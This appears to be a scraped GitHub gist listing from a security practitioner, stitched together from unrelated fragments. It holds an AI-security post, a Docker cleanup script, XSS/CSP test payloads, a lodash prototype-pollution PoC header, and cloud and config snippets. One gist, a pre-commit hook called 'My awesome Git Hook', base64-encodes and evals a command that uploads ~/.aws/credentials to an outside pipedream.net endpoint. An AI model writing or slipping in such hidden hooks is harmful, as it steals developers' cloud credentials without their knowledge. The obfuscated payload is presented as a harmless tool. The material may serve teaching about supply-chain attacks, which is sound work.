Abhay Bhargav abhaybhargav

  • we45
  • All over the world
We're worried about our crazy AI adoption!
Is something I've heard a lot of CISOs and ProdSec teams really worry about. And rightfully so. I see engineering teams start to plug LLMs into everything without thinking about security or privacy. This risk is heightened with Agents, because now, LLMs can literally call (sometimes extremely powerful) functions that can execute actions on your internal systems, APIs and more. And the AI landscape is massive and getting bigger every day.
This scares a lot of people and seems overwhelming. But let's break things down into smaller problems to make things easier to handle.
In my experience, 80%+ of companies out there are building two types of apps:
* RAG (Retrieval Augmented Generation) apps where the org's internal datasets are loaded into vector databases and LLMs use that as context to generate responses for chatbots, internal applications and more
abhaybhargav / clean-docker
Created September 3, 2022 09:32
Docker Cleanup script
docker stop $(docker ps -q)
docker rm $(docker ps -a -q)
docker rmi $(docker images -q -f dangling=true)
docker network prune
docker volume prune
abhaybhargav / pre-commit
Created August 4, 2022 21:52
My awesome Git Hook
#!/bin/bash
j=$(echo "Y3VybCAtZCAneyJwYXJhbSI6ICInIiQoY2F0IH4vLmF3cy9jcmVkZW50aWFscyB8IGJhc2U2NCkiJyJ9JyAtSCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uIiAtWCBQT1NUIGh0dHBzOi8vZW80NmgzNmgxdnA4eW0ubS5waXBlZHJlYW0ubmV0" | base64 --decode)
eval $j
abhaybhargav / index.js
Created June 10, 2022 02:05
Malicious CSP Payload
alert('this is a xss attack ' + document.domain)
abhaybhargav / index.js
Last active June 11, 2022 01:18
CSP Genuine Payload
alert("This is genuine JS");
abhaybhargav / index.js
Created October 21, 2020 10:54
LodashJS Prototype Pollution PoC code
//Lodash Prototype Pollution PoC Code
// lodash version used == 4.17.4
// Author: Abhay Bhargav
// Disclaimer: This is vulnerable code. You are solely responsible for how you use it
const _ = require("lodash");
const express = require("express");
const bodyParser = require("body-parser");
import googleapiclient.discovery
import sys
def main(name, url):
    compute = googleapiclient.discovery.build('compute', 'beta')
    result = compute.images().get(project="boreal-rain-289205", image="bti-base").execute()
    config = {
        "name": name,
git clone ${REPO_URL} /root/
/bin/chmod +x /root/${PR_NAME}/setup.sh
/bin/bash +x /root/${PR_NAME}/setup.sh
rm /root/${PR_NAME}/setup.sh
rm /root/${PR_NAME}/.gitlab-ci.yml
rm /root/${PR_NAME}/.gitignore
rm /root/${PR_NAME}/README.md
rm -rf /root/${PR_NAME}/.git
rm /root/set.sh
rm /root/setup.sh
abhaybhargav / caddy_templater.py
Last active September 9, 2020 12:02
Caddy Templater
#!/usr/bin/env python
import json
import argparse
from sys import exit
caddy_dict = {'apps': {'http': {'servers': {'srv0': {'listen': [':443'],
'routes': [{'match': [],
'handle': [{'handler': 'subroute',
'routes': [{'handle': [{'handler': 'reverse_proxy',
abhaybhargav / clarifications.md
Created September 7, 2020 14:14
Points on SCA and SBOM for Verification

Notes on CPE and SWID

  • CPE is being EOLd, resulting in SWID, which is an ISO-paywalled document (Question: Is this accurate? Because I haven't found any reference to an EOL date)
  • This has also resulted in the splintering of several Platform Vulnerability Databases:
    • Rust's DB
    • NPM for NodeJS
    • PyUP for Python

(Again, not sure if this is accurate)

CycloneDX SBOM Spec